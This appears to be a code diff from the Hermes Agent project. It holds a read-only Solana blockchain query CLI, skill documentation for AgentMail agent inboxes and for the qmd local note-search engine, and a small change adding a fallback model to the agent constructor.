except urllib.error.URLError as exc:
sys.exit(f"RPC connection error: {exc}")
return None
# Keep backward compat — the rest of the code uses `rpc()`.
rpc = _rpc_call
def rpc_batch(calls: list) -> list:
"""Send a batch of JSON-RPC requests (with retry on 429)."""
payload = json.dumps([
{"jsonrpc": "2.0", "id": i, "method": c["method"], "params": c.get("params", [])}
for i, c in enumerate(calls)
]).encode()
for attempt in range(3):
req = urllib.request.Request(
RPC_URL, data=payload,
headers={"Content-Type": "application/json"}, method="POST",
)
try:
with urllib.request.urlopen(req, timeout=20) as resp:
return json.load(resp)
except urllib.error.HTTPError as exc:
if exc.code == 429 and attempt < 2:
time.sleep(1.5 * (attempt + 1))
continue
sys.exit(f"RPC batch HTTP error: {exc}")
except urllib.error.URLError as exc:
sys.exit(f"RPC batch error: {exc}")
return []
def lamports_to_sol(lamports: int) -> float:
return lamports / LAMPORTS_PER_SOL
def print_json(obj: Any) -> None:
print(json.dumps(obj, indent=2))
def _short_mint(mint: str) -> str:
"""Abbreviate a mint address for display: first 4 + last 4."""
if len(mint) <= 12:
return mint
return f"{mint[:4]}...{mint[-4:]}"
# ---------------------------------------------------------------------------
# Price & token name helpers (CoinGecko — free, no API key)
# ---------------------------------------------------------------------------
def fetch_prices(mints: List[str], max_lookups: int = 20) -> Dict[str, float]:
"""Fetch USD prices for mint addresses via CoinGecko (one per request).
CoinGecko free tier doesn't support batch Solana token lookups,
so we do individual calls — capped at *max_lookups* to stay within
rate limits. Returns {mint: usd_price}.
"""
prices: Dict[str, float] = {}
for i, mint in enumerate(mints[:max_lookups]):
url = (
f"https://api.coingecko.com/api/v3/simple/token_price/solana"
f"?contract_addresses={mint}&vs_currencies=usd"
)
data = _http_get_json(url, timeout=10)
if data and isinstance(data, dict):
for addr, info in data.items():
if isinstance(info, dict) and "usd" in info:
prices[mint] = info["usd"]
break
# Pause between calls to respect CoinGecko free-tier rate-limits
if i < len(mints[:max_lookups]) - 1:
time.sleep(1.0)
return prices
def fetch_sol_price() -> Optional[float]:
"""Fetch current SOL price in USD via CoinGecko."""
data = _http_get_json(
"https://api.coingecko.com/api/v3/simple/price?ids=solana&vs_currencies=usd"
)
if data and "solana" in data:
return data["solana"].get("usd")
return None
def resolve_token_name(mint: str) -> Optional[Dict[str, str]]:
"""Look up token name and symbol from CoinGecko by mint address.
Returns {"name": ..., "symbol": ...} or None.
"""
if mint in KNOWN_TOKENS:
sym, name = KNOWN_TOKENS[mint]
return {"symbol": sym, "name": name}
url = f"https://api.coingecko.com/api/v3/coins/solana/contract/{mint}"
data = _http_get_json(url, timeout=10)
if data and "symbol" in data:
return {"symbol": data["symbol"].upper(), "name": data.get("name", "")}
return None
def _token_label(mint: str) -> str:
"""Return a human-readable label for a mint: symbol if known, else abbreviated address."""
if mint in KNOWN_TOKENS:
return KNOWN_TOKENS[mint][0]
return _short_mint(mint)
# ---------------------------------------------------------------------------
# 1. Network Stats
# ---------------------------------------------------------------------------
def cmd_stats(_args):
"""Live Solana network: slot, epoch, TPS, supply, version, SOL price."""
results = rpc_batch([
{"method": "getSlot"},
{"method": "getEpochInfo"},
{"method": "getRecentPerformanceSamples", "params": [1]},
{"method": "getSupply"},
{"method": "getVersion"},
])
by_id = {r["id"]: r.get("result") for r in results}
slot = by_id.get(0)
epoch_info = by_id.get(1)
perf_samples = by_id.get(2)
supply = by_id.get(3)
version = by_id.get(4)
tps = None
if perf_samples:
s = perf_samples[0]
tps = round(s["numTransactions"] / s["samplePeriodSecs"], 1)
total_supply = lamports_to_sol(supply["value"]["total"]) if supply else None
circ_supply = lamports_to_sol(supply["value"]["circulating"]) if supply else None
sol_price = fetch_sol_price()
out = {
"slot": slot,
"epoch": epoch_info.get("epoch") if epoch_info else None,
"slot_in_epoch": epoch_info.get("slotIndex") if epoch_info else None,
"tps": tps,
"total_supply_SOL": round(total_supply, 2) if total_supply else None,
"circulating_supply_SOL": round(circ_supply, 2) if circ_supply else None,
"validator_version": version.get("solana-core") if version else None,
}
if sol_price is not None:
out["sol_price_usd"] = sol_price
if circ_supply:
out["market_cap_usd"] = round(sol_price * circ_supply, 0)
print_json(out)
# ---------------------------------------------------------------------------
# 2. Wallet Info (enhanced with prices, sorting, filtering)
# ---------------------------------------------------------------------------
def cmd_wallet(args):
"""SOL balance + SPL token holdings with USD values."""
address = args.address
show_all = getattr(args, "all", False)
limit = getattr(args, "limit", 20) or 20
skip_prices = getattr(args, "no_prices", False)
# Fetch SOL balance
balance_result = rpc("getBalance", [address])
sol_balance = lamports_to_sol(balance_result["value"])
# Fetch all SPL token accounts
token_result = rpc("getTokenAccountsByOwner", [
address,
{"programId": "TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA"},
{"encoding": "jsonParsed"},
])
raw_tokens = []
for acct in (token_result.get("value") or []):
info = acct["account"]["data"]["parsed"]["info"]
ta = info["tokenAmount"]
amount = float(ta.get("uiAmountString") or 0)
if amount > 0:
raw_tokens.append({
"mint": info["mint"],
"amount": amount,
"decimals": ta["decimals"],
})
# Separate NFTs (amount=1, decimals=0) from fungible tokens
nfts = [t for t in raw_tokens if t["decimals"] == 0 and t["amount"] == 1]
fungible = [t for t in raw_tokens if not (t["decimals"] == 0 and t["amount"] == 1)]
# Fetch prices for fungible tokens (cap lookups to avoid API abuse)
sol_price = None
prices: Dict[str, float] = {}
if not skip_prices and fungible:
sol_price = fetch_sol_price()
# Prioritize known tokens, then a small sample of unknowns.
# CoinGecko free tier = 1 request per mint, so we cap lookups.
known_mints = [t["mint"] for t in fungible if t["mint"] in KNOWN_TOKENS]
other_mints = [t["mint"] for t in fungible if t["mint"] not in KNOWN_TOKENS][:15]
mints_to_price = known_mints + other_mints
if mints_to_price:
prices = fetch_prices(mints_to_price, max_lookups=30)
# Enrich tokens with labels and USD values
enriched = []
dust_count = 0
dust_value = 0.0
for t in fungible:
mint = t["mint"]
label = _token_label(mint)
usd_price = prices.get(mint)
usd_value = round(usd_price * t["amount"], 2) if usd_price else None
# Filter dust (< $0.01) unless --all
if not show_all and usd_value is not None and usd_value < 0.01:
dust_count += 1
dust_value += usd_value
continue
entry = {"token": label, "mint": mint, "amount": t["amount"]}
if usd_price is not None:
entry["price_usd"] = usd_price
entry["value_usd"] = usd_value
enriched.append(entry)
# Sort: tokens with known USD value first (highest→lowest), then unknowns
enriched.sort(key=lambda x: (x.get("value_usd") is not None, x.get("value_usd") or 0), reverse=True)
# Apply limit unless --all
total_tokens = len(enriched)
if not show_all and len(enriched) > limit:
enriched = enriched[:limit]
# Compute portfolio total
total_usd = sum(t.get("value_usd", 0) for t in enriched)
sol_value_usd = round(sol_price * sol_balance, 2) if sol_price else None
if sol_value_usd:
total_usd += sol_value_usd
total_usd += dust_value
output = {
"address": address,
"sol_balance": round(sol_balance, 9),
}
if sol_price:
output["sol_price_usd"] = sol_price
output["sol_value_usd"] = sol_value_usd
output["tokens_shown"] = len(enriched)
if total_tokens > len(enriched):
output["tokens_hidden"] = total_tokens - len(enriched)
output["spl_tokens"] = enriched
if dust_count > 0:
output["dust_filtered"] = {"count": dust_count, "total_value_usd": round(dust_value, 4)}
output["nft_count"] = len(nfts)
if nfts:
output["nfts"] = [_token_label(n["mint"]) + f" ({_short_mint(n['mint'])})" for n in nfts[:10]]
if len(nfts) > 10:
output["nfts"].append(f"... and {len(nfts) - 10} more")
if total_usd > 0:
output["portfolio_total_usd"] = round(total_usd, 2)
print_json(output)
# ---------------------------------------------------------------------------
# 3. Transaction Details
# ---------------------------------------------------------------------------
def cmd_tx(args):
"""Full transaction details by signature."""
result = rpc("getTransaction", [
args.signature,
{"encoding": "jsonParsed", "maxSupportedTransactionVersion": 0},
])
if result is None:
sys.exit("Transaction not found (may be too old for public RPC history).")
meta = result.get("meta", {}) or {}
msg = result.get("transaction", {}).get("message", {})
account_keys = msg.get("accountKeys", [])
pre = meta.get("preBalances", [])
post = meta.get("postBalances", [])
balance_changes = []
for i, key in enumerate(account_keys):
acct_key = key["pubkey"] if isinstance(key, dict) else key
if i < len(pre) and i < len(post):
change = lamports_to_sol(post[i] - pre[i])
if change != 0:
balance_changes.append({"account": acct_key, "change_SOL": round(change, 9)})
programs = []
for ix in msg.get("instructions", []):
prog = ix.get("programId")
if prog is None and "programIdIndex" in ix:
k = account_keys[ix["programIdIndex"]]
prog = k["pubkey"] if isinstance(k, dict) else k
if prog:
programs.append(prog)
# Add USD value for SOL changes
sol_price = fetch_sol_price()
if sol_price and balance_changes:
for bc in balance_changes:
bc["change_USD"] = round(bc["change_SOL"] * sol_price, 2)
print_json({
"signature": args.signature,
"slot": result.get("slot"),
"block_time": result.get("blockTime"),
"fee_SOL": lamports_to_sol(meta.get("fee", 0)),
"status": "success" if meta.get("err") is None else "failed",
"balance_changes": balance_changes,
"programs_invoked": list(dict.fromkeys(programs)),
})
# ---------------------------------------------------------------------------
# 4. Token Info (enhanced with name + price)
# ---------------------------------------------------------------------------
def cmd_token(args):
"""SPL token metadata, supply, decimals, price, top holders."""
mint = args.mint
mint_info = rpc("getAccountInfo", [mint, {"encoding": "jsonParsed"}])
if mint_info is None or mint_info.get("value") is None:
sys.exit("Mint account not found.")
parsed = mint_info["value"]["data"]["parsed"]["info"]
decimals = parsed.get("decimals", 0)
supply_raw = int(parsed.get("supply", 0))
supply_human = supply_raw / (10 ** decimals) if decimals else supply_raw
largest = rpc("getTokenLargestAccounts", [mint])
holders = []
for acct in (largest.get("value") or [])[:5]:
amount = float(acct.get("uiAmountString") or 0)
pct = round((amount / supply_human * 100), 4) if supply_human > 0 else 0
holders.append({
"account": acct["address"],
"amount": amount,
"percent": pct,
})
# Resolve name + price
token_meta = resolve_token_name(mint)
price_data = fetch_prices([mint])
out = {"mint": mint}
if token_meta:
out["name"] = token_meta["name"]
out["symbol"] = token_meta["symbol"]
out["decimals"] = decimals
out["supply"] = round(supply_human, min(decimals, 6))
out["mint_authority"] = parsed.get("mintAuthority")
out["freeze_authority"] = parsed.get("freezeAuthority")
if mint in price_data:
out["price_usd"] = price_data[mint]
out["market_cap_usd"] = round(price_data[mint] * supply_human, 0)
out["top_5_holders"] = holders
print_json(out)
# ---------------------------------------------------------------------------
# 5. Recent Activity
# ---------------------------------------------------------------------------
def cmd_activity(args):
"""Recent transaction signatures for an address."""
limit = min(args.limit, 25)
result = rpc("getSignaturesForAddress", [args.address, {"limit": limit}])
txs = [
{
"signature": item["signature"],
"slot": item.get("slot"),
"block_time": item.get("blockTime"),
"err": item.get("err"),
}
for item in (result or [])
]
print_json({"address": args.address, "transactions": txs})
# ---------------------------------------------------------------------------
# 6. NFT Portfolio
# ---------------------------------------------------------------------------
def cmd_nft(args):
"""NFTs owned by a wallet (amount=1 && decimals=0 heuristic)."""
result = rpc("getTokenAccountsByOwner", [
args.address,
{"programId": "TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA"},
{"encoding": "jsonParsed"},
])
nfts = [
acct["account"]["data"]["parsed"]["info"]["mint"]
for acct in (result.get("value") or [])
if acct["account"]["data"]["parsed"]["info"]["tokenAmount"]["decimals"] == 0
and int(acct["account"]["data"]["parsed"]["info"]["tokenAmount"]["amount"]) == 1
]
print_json({
"address": args.address,
"nft_count": len(nfts),
"nfts": nfts,
"note": "Heuristic only. Compressed NFTs (cNFTs) are not detected.",
})
# ---------------------------------------------------------------------------
# 7. Whale Detector (enhanced with USD values)
# ---------------------------------------------------------------------------
def cmd_whales(args):
"""Scan the latest block for large SOL transfers."""
min_lamports = int(args.min_sol * LAMPORTS_PER_SOL)
slot = rpc("getSlot")
block = rpc("getBlock", [
slot,
{
"encoding": "jsonParsed",
"transactionDetails": "full",
"maxSupportedTransactionVersion": 0,
"rewards": False,
},
])
if block is None:
sys.exit("Could not retrieve latest block.")
sol_price = fetch_sol_price()
whales = []
for tx in (block.get("transactions") or []):
meta = tx.get("meta", {}) or {}
if meta.get("err") is not None:
continue
msg = tx["transaction"].get("message", {})
account_keys = msg.get("accountKeys", [])
pre = meta.get("preBalances", [])
post = meta.get("postBalances", [])
for i in range(len(pre)):
change = post[i] - pre[i]
if change >= min_lamports:
k = account_keys[i]
receiver = k["pubkey"] if isinstance(k, dict) else k
sender = None
for j in range(len(pre)):
if pre[j] - post[j] >= min_lamports:
sk = account_keys[j]
sender = sk["pubkey"] if isinstance(sk, dict) else sk
break
entry = {
"sender": sender,
"receiver": receiver,
"amount_SOL": round(lamports_to_sol(change), 4),
}
if sol_price:
entry["amount_USD"] = round(lamports_to_sol(change) * sol_price, 2)
whales.append(entry)
out = {
"slot": slot,
"min_threshold_SOL": args.min_sol,
"large_transfers": whales,
"note": "Scans latest block only — point-in-time snapshot.",
}
if sol_price:
out["sol_price_usd"] = sol_price
print_json(out)
# ---------------------------------------------------------------------------
# 8. Price Lookup
# ---------------------------------------------------------------------------
def cmd_price(args):
"""Quick price lookup for a token by mint address or known symbol."""
query = args.token
# Check if it's a known symbol
mint = _SYMBOL_TO_MINT.get(query.upper(), query)
# Try to resolve name
token_meta = resolve_token_name(mint)
# Fetch price
prices = fetch_prices([mint])
out = {"query": query, "mint": mint}
if token_meta:
out["name"] = token_meta["name"]
out["symbol"] = token_meta["symbol"]
if mint in prices:
out["price_usd"] = prices[mint]
else:
out["price_usd"] = None
out["note"] = "Price not available — token may not be listed on CoinGecko."
print_json(out)
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(
prog="solana_client.py",
description="Solana blockchain query tool for Hermes Agent",
)
sub = parser.add_subparsers(dest="command", required=True)
sub.add_parser("stats", help="Network stats: slot, epoch, TPS, supply, SOL price")
p_wallet = sub.add_parser("wallet", help="SOL balance + SPL tokens with USD values")
p_wallet.add_argument("address")
p_wallet.add_argument("--limit", type=int, default=20,
help="Max tokens to display (default: 20)")
p_wallet.add_argument("--all", action="store_true",
help="Show all tokens (no limit, no dust filter)")
p_wallet.add_argument("--no-prices", action="store_true",
help="Skip price lookups (faster, RPC-only)")
p_tx = sub.add_parser("tx", help="Transaction details by signature")
p_tx.add_argument("signature")
p_token = sub.add_parser("token", help="SPL token metadata, price, and top holders")
p_token.add_argument("mint")
p_activity = sub.add_parser("activity", help="Recent transactions for an address")
p_activity.add_argument("address")
p_activity.add_argument("--limit", type=int, default=10,
help="Number of transactions (max 25, default 10)")
p_nft = sub.add_parser("nft", help="NFT portfolio for a wallet")
p_nft.add_argument("address")
p_whales = sub.add_parser("whales", help="Large SOL transfers in the latest block")
p_whales.add_argument("--min-sol", type=float, default=1000.0,
help="Minimum SOL transfer size (default: 1000)")
p_price = sub.add_parser("price", help="Quick price lookup by mint or symbol")
p_price.add_argument("token", help="Mint address or known symbol (SOL, BONK, JUP, ...)")
args = parser.parse_args()
dispatch = {
"stats": cmd_stats,
"wallet": cmd_wallet,
"tx": cmd_tx,
"token": cmd_token,
"activity": cmd_activity,
"nft": cmd_nft,
"whales": cmd_whales,
"price": cmd_price,
}
dispatch[args.command](args)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,125 @@
---
name: agentmail
description: Give the agent its own dedicated email inbox via AgentMail. Send, receive, and manage email autonomously using agent-owned email addresses (e.g. hermes-agent@agentmail.to).
version: 1.0.0
metadata:
hermes:
tags: [email, communication, agentmail, mcp]
category: email
---
# AgentMail — Agent-Owned Email Inboxes
## Requirements
- **AgentMail API key** (required) — sign up at https://console.agentmail.to (free tier: 3 inboxes, 3,000 emails/month; paid plans from $20/mo)
- Node.js 18+ (for the MCP server)
## When to Use
Use this skill when you need to:
- Give the agent its own dedicated email address
- Send emails autonomously on behalf of the agent
- Receive and read incoming emails
- Manage email threads and conversations
- Sign up for services or authenticate via email
- Communicate with other agents or humans via email
This is NOT for reading the user's personal email (use himalaya or Gmail for that).
AgentMail gives the agent its own identity and inbox.
## Setup
### 1. Get an API Key
- Go to https://console.agentmail.to
- Create an account and generate an API key (starts with `am_`)
### 2. Configure MCP Server
Add to `~/.hermes/config.yaml` (paste your actual key — MCP env vars are not expanded from .env):
```yaml
mcp_servers:
agentmail:
command: "npx"
args: ["-y", "agentmail-mcp"]
env:
AGENTMAIL_API_KEY: "am_your_key_here"
```
### 3. Restart Hermes
```bash
hermes
```
All 11 AgentMail tools are now available automatically.
## Available Tools (via MCP)
| Tool | Description |
|------|-------------|
| `list_inboxes` | List all agent inboxes |
| `get_inbox` | Get details of a specific inbox |
| `create_inbox` | Create a new inbox (gets a real email address) |
| `delete_inbox` | Delete an inbox |
| `list_threads` | List email threads in an inbox |
| `get_thread` | Get a specific email thread |
| `send_message` | Send a new email |
| `reply_to_message` | Reply to an existing email |
| `forward_message` | Forward an email |
| `update_message` | Update message labels/status |
| `get_attachment` | Download an email attachment |
## Procedure
### Create an inbox and send an email
1. Create a dedicated inbox:
- Use `create_inbox` with a username (e.g. `hermes-agent`)
- The agent gets address: `hermes-agent@agentmail.to`
2. Send an email:
- Use `send_message` with `inbox_id`, `to`, `subject`, `text`
3. Check for replies:
- Use `list_threads` to see incoming conversations
- Use `get_thread` to read a specific thread
### Check incoming email
1. Use `list_inboxes` to find your inbox ID
2. Use `list_threads` with the inbox ID to see conversations
3. Use `get_thread` to read a thread and its messages
### Reply to an email
1. Get the thread with `get_thread`
2. Use `reply_to_message` with the message ID and your reply text
## Example Workflows
**Sign up for a service:**
```
1. create_inbox (username: "signup-bot")
2. Use the inbox address to register on the service
3. list_threads to check for verification email
4. get_thread to read the verification code
```
**Agent-to-human outreach:**
```
1. create_inbox (username: "hermes-outreach")
2. send_message (to: user@example.com, subject: "Hello", text: "...")
3. list_threads to check for replies
```
## Pitfalls
- Free tier limited to 3 inboxes and 3,000 emails/month
- Emails come from `@agentmail.to` domain on free tier (custom domains on paid plans)
- Node.js (18+) is required for the MCP server (`npx -y agentmail-mcp`)
- The `mcp` Python package must be installed: `pip install mcp`
- Real-time inbound email (webhooks) requires a public server — use `list_threads` polling via cronjob instead for personal use
## Verification
After setup, test with:
```
hermes --toolsets mcp -q "Create an AgentMail inbox called test-agent and tell me its email address"
```
You should see the new inbox address returned.
## References
- AgentMail docs: https://docs.agentmail.to/
- AgentMail console: https://console.agentmail.to
- AgentMail MCP repo: https://github.com/agentmail-to/agentmail-mcp
- Pricing: https://www.agentmail.to/pricing

View File

@@ -0,0 +1,441 @@
---
name: qmd
description: Search personal knowledge bases, notes, docs, and meeting transcripts locally using qmd — a hybrid retrieval engine with BM25, vector search, and LLM reranking. Supports CLI and MCP integration.
version: 1.0.0
author: Hermes Agent + Teknium
license: MIT
platforms: [macos, linux]
metadata:
hermes:
tags: [Search, Knowledge-Base, RAG, Notes, MCP, Local-AI]
related_skills: [obsidian, native-mcp, arxiv]
---
# QMD — Query Markup Documents
Local, on-device search engine for personal knowledge bases. Indexes markdown
notes, meeting transcripts, documentation, and any text-based files, then
provides hybrid search combining keyword matching, semantic understanding, and
LLM-powered reranking — all running locally with no cloud dependencies.
Created by [Tobi Lütke](https://github.com/tobi/qmd). MIT licensed.
## When to Use
- User asks to search their notes, docs, knowledge base, or meeting transcripts
- User wants to find something across a large collection of markdown/text files
- User wants semantic search ("find notes about X concept") not just keyword grep
- User has already set up qmd collections and wants to query them
- User asks to set up a local knowledge base or document search system
- Keywords: "search my notes", "find in my docs", "knowledge base", "qmd"
## Prerequisites
### Node.js >= 22 (required)
```bash
# Check version
node --version # must be >= 22
# macOS — install or upgrade via Homebrew
brew install node@22
# Linux — use NodeSource or nvm
curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -
sudo apt-get install -y nodejs
# or with nvm:
nvm install 22 && nvm use 22
```
### SQLite with Extension Support (macOS only)
macOS system SQLite lacks extension loading. Install via Homebrew:
```bash
brew install sqlite
```
### Install qmd
```bash
npm install -g @tobilu/qmd
# or with Bun:
bun install -g @tobilu/qmd
```
First run auto-downloads 3 local GGUF models (~2GB total):
| Model | Purpose | Size |
|-------|---------|------|
| embeddinggemma-300M-Q8_0 | Vector embeddings | ~300MB |
| qwen3-reranker-0.6b-q8_0 | Result reranking | ~640MB |
| qmd-query-expansion-1.7B | Query expansion | ~1.1GB |
### Verify Installation
```bash
qmd --version
qmd status
```
## Quick Reference
| Command | What It Does | Speed |
|---------|-------------|-------|
| `qmd search "query"` | BM25 keyword search (no models) | ~0.2s |
| `qmd vsearch "query"` | Semantic vector search (1 model) | ~3s |
| `qmd query "query"` | Hybrid + reranking (all 3 models) | ~2-3s warm, ~19s cold |
| `qmd get <docid>` | Retrieve full document content | instant |
| `qmd multi-get "glob"` | Retrieve multiple files | instant |
| `qmd collection add <path> --name <n>` | Add a directory as a collection | instant |
| `qmd context add <path> "description"` | Add context metadata to improve retrieval | instant |
| `qmd embed` | Generate/update vector embeddings | varies |
| `qmd status` | Show index health and collection info | instant |
| `qmd mcp` | Start MCP server (stdio) | persistent |
| `qmd mcp --http --daemon` | Start MCP server (HTTP, warm models) | persistent |
## Setup Workflow
### 1. Add Collections
Point qmd at directories containing your documents:
```bash
# Add a notes directory
qmd collection add ~/notes --name notes
# Add project docs
qmd collection add ~/projects/myproject/docs --name project-docs
# Add meeting transcripts
qmd collection add ~/meetings --name meetings
# List all collections
qmd collection list
```
### 2. Add Context Descriptions
Context metadata helps the search engine understand what each collection
contains. This significantly improves retrieval quality:
```bash
qmd context add qmd://notes "Personal notes, ideas, and journal entries"
qmd context add qmd://project-docs "Technical documentation for the main project"
qmd context add qmd://meetings "Meeting transcripts and action items from team syncs"
```
### 3. Generate Embeddings
```bash
qmd embed
```
This processes all documents in all collections and generates vector
embeddings. Re-run after adding new documents or collections.
### 4. Verify
```bash
qmd status # shows index health, collection stats, model info
```
## Search Patterns
### Fast Keyword Search (BM25)
Best for: exact terms, code identifiers, names, known phrases.
No models loaded — near-instant results.
```bash
qmd search "authentication middleware"
qmd search "handleError async"
```
### Semantic Vector Search
Best for: natural language questions, conceptual queries.
Loads embedding model (~3s first query).
```bash
qmd vsearch "how does the rate limiter handle burst traffic"
qmd vsearch "ideas for improving onboarding flow"
```
### Hybrid Search with Reranking (Best Quality)
Best for: important queries where quality matters most.
Uses all 3 models — query expansion, parallel BM25+vector, reranking.
```bash
qmd query "what decisions were made about the database migration"
```
### Structured Multi-Mode Queries
Combine different search types in a single query for precision:
```bash
# BM25 for exact term + vector for concept
qmd query $'lex: rate limiter\nvec: how does throttling work under load'
# With query expansion
qmd query $'expand: database migration plan\nlex: "schema change"'
```
### Query Syntax (lex/BM25 mode)
| Syntax | Effect | Example |
|--------|--------|---------|
| `term` | Prefix match | `perf` matches "performance" |
| `"phrase"` | Exact phrase | `"rate limiter"` |
| `-term` | Exclude term | `performance -sports` |
### HyDE (Hypothetical Document Embeddings)
For complex topics, write what you expect the answer to look like:
```bash
qmd query $'hyde: The migration plan involves three phases. First, we add the new columns without dropping the old ones. Then we backfill data. Finally we cut over and remove legacy columns.'
```
### Scoping to Collections
```bash
qmd search "query" --collection notes
qmd query "query" --collection project-docs
```
### Output Formats
```bash
qmd search "query" --json # JSON output (best for parsing)
qmd search "query" --limit 5 # Limit results
qmd get "#abc123" # Get by document ID
qmd get "path/to/file.md" # Get by file path
qmd get "file.md:50" -l 100 # Get specific line range
qmd multi-get "journals/*.md" --json # Batch retrieve by glob
```
## MCP Integration (Recommended)
qmd exposes an MCP server that provides search tools directly to
Hermes Agent via the native MCP client. This is the preferred
integration — once configured, the agent gets qmd tools automatically
without needing to load this skill.
### Option A: Stdio Mode (Simple)
Add to `~/.hermes/config.yaml`:
```yaml
mcp_servers:
qmd:
command: "qmd"
args: ["mcp"]
timeout: 30
connect_timeout: 45
```
This registers tools: `mcp_qmd_search`, `mcp_qmd_vsearch`,
`mcp_qmd_deep_search`, `mcp_qmd_get`, `mcp_qmd_status`.
**Tradeoff:** Models load on first search call (~19s cold start),
then stay warm for the session. Acceptable for occasional use.
### Option B: HTTP Daemon Mode (Fast, Recommended for Heavy Use)
Start the qmd daemon separately — it keeps models warm in memory:
```bash
# Start daemon (persists across agent restarts)
qmd mcp --http --daemon
# Runs on http://localhost:8181 by default
```
Then configure Hermes Agent to connect via HTTP:
```yaml
mcp_servers:
qmd:
url: "http://localhost:8181/mcp"
timeout: 30
```
**Tradeoff:** Uses ~2GB RAM while running, but every query is fast
(~2-3s). Best for users who search frequently.
### Keeping the Daemon Running
#### macOS (launchd)
```bash
cat > ~/Library/LaunchAgents/com.qmd.daemon.plist << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.qmd.daemon</string>
<key>ProgramArguments</key>
<array>
<string>qmd</string>
<string>mcp</string>
<string>--http</string>
<string>--daemon</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
<key>StandardOutPath</key>
<string>/tmp/qmd-daemon.log</string>
<key>StandardErrorPath</key>
<string>/tmp/qmd-daemon.log</string>
</dict>
</plist>
EOF
launchctl load ~/Library/LaunchAgents/com.qmd.daemon.plist
```
#### Linux (systemd user service)
```bash
mkdir -p ~/.config/systemd/user
cat > ~/.config/systemd/user/qmd-daemon.service << 'EOF'
[Unit]
Description=QMD MCP Daemon
After=network.target
[Service]
ExecStart=qmd mcp --http --daemon
Restart=on-failure
RestartSec=10
Environment=PATH=/usr/local/bin:/usr/bin:/bin
[Install]
WantedBy=default.target
EOF
systemctl --user daemon-reload
systemctl --user enable --now qmd-daemon
systemctl --user status qmd-daemon
```
### MCP Tools Reference
Once connected, these tools are available as `mcp_qmd_*`:
| MCP Tool | Maps To | Description |
|----------|---------|-------------|
| `mcp_qmd_search` | `qmd search` | BM25 keyword search |
| `mcp_qmd_vsearch` | `qmd vsearch` | Semantic vector search |
| `mcp_qmd_deep_search` | `qmd query` | Hybrid search + reranking |
| `mcp_qmd_get` | `qmd get` | Retrieve document by ID or path |
| `mcp_qmd_status` | `qmd status` | Index health and stats |
The MCP tools accept structured JSON queries for multi-mode search:
```json
{
"searches": [
{"type": "lex", "query": "authentication middleware"},
{"type": "vec", "query": "how user login is verified"}
],
"collections": ["project-docs"],
"limit": 10
}
```
## CLI Usage (Without MCP)
When MCP is not configured, use qmd directly via terminal:
```
terminal(command="qmd query 'what was decided about the API redesign' --json", timeout=30)
```
For setup and management tasks, always use terminal:
```
terminal(command="qmd collection add ~/Documents/notes --name notes")
terminal(command="qmd context add qmd://notes 'Personal research notes and ideas'")
terminal(command="qmd embed")
terminal(command="qmd status")
```
## How the Search Pipeline Works
Understanding the internals helps choose the right search mode:
1. **Query Expansion** — A fine-tuned 1.7B model generates 2 alternative
queries. The original gets 2x weight in fusion.
2. **Parallel Retrieval** — BM25 (SQLite FTS5) and vector search run
simultaneously across all query variants.
3. **RRF Fusion** — Reciprocal Rank Fusion (k=60) merges results.
Top-rank bonus: #1 gets +0.05, #2-3 get +0.02.
4. **LLM Reranking** — qwen3-reranker scores top 30 candidates (0.0-1.0).
5. **Position-Aware Blending** — Ranks 1-3: 75% retrieval / 25% reranker.
Ranks 4-10: 60/40. Ranks 11+: 40/60 (trusts reranker more for long tail).
**Smart Chunking:** Documents are split at natural break points (headings,
code blocks, blank lines) targeting ~900 tokens with 15% overlap. Code
blocks are never split mid-block.
## Best Practices
1. **Always add context descriptions**`qmd context add` dramatically
improves retrieval accuracy. Describe what each collection contains.
2. **Re-embed after adding documents**`qmd embed` must be re-run when
new files are added to collections.
3. **Use `qmd search` for speed** — when you need fast keyword lookup
(code identifiers, exact names), BM25 is instant and needs no models.
4. **Use `qmd query` for quality** — when the question is conceptual or
the user needs the best possible results, use hybrid search.
5. **Prefer MCP integration** — once configured, the agent gets native
tools without needing to load this skill each time.
6. **Daemon mode for frequent users** — if the user searches their
knowledge base regularly, recommend the HTTP daemon setup.
7. **First query in structured search gets 2x weight** — put the most
important/certain query first when combining lex and vec.
## Troubleshooting
### "Models downloading on first run"
Normal — qmd auto-downloads ~2GB of GGUF models on first use.
This is a one-time operation.
### Cold start latency (~19s)
This happens when models aren't loaded in memory. Solutions:
- Use HTTP daemon mode (`qmd mcp --http --daemon`) to keep warm
- Use `qmd search` (BM25 only) when models aren't needed
- MCP stdio mode loads models on first search, stays warm for session
### macOS: "unable to load extension"
Install Homebrew SQLite: `brew install sqlite`
Then ensure it's on PATH before system SQLite.
### "No collections found"
Run `qmd collection add <path> --name <name>` to add directories,
then `qmd embed` to index them.
### Embedding model override (CJK/multilingual)
Set `QMD_EMBED_MODEL` environment variable for non-English content:
```bash
export QMD_EMBED_MODEL="your-multilingual-model"
```
## Data Storage
- **Index & vectors:** `~/.cache/qmd/index.sqlite`
- **Models:** Auto-downloaded to local cache on first run
- **No cloud dependencies** — everything runs locally
## References
- [GitHub: tobi/qmd](https://github.com/tobi/qmd)
- [QMD Changelog](https://github.com/tobi/qmd/blob/main/CHANGELOG.md)

View File

@@ -183,6 +183,7 @@ class AIAgent:
session_db=None,
honcho_session_key: str = None,
iteration_budget: "IterationBudget" = None,
fallback_model: Dict[str, Any] = None,
):
"""
Initialize the AI Agent.
@@ -213,7 +214,7 @@ class AIAgent:
Provided by the platform layer (CLI or gateway). If None, the clarify tool returns an error.
max_tokens (int): Maximum tokens for model responses (optional, uses model default if not set)
reasoning_config (Dict): OpenRouter reasoning configuration override (e.g. {"effort": "none"} to disable thinking).
If None, defaults to {"enabled": True, "effort": "xhigh"} for OpenRouter. Set to disable/customize reasoning.
If None, defaults to {"enabled": True, "effort": "medium"} for OpenRouter. Set to disable/customize reasoning.
prefill_messages (List[Dict]): Messages to prepend to conversation history as prefilled context.
Useful for injecting a few-shot example or priming the model's response style.
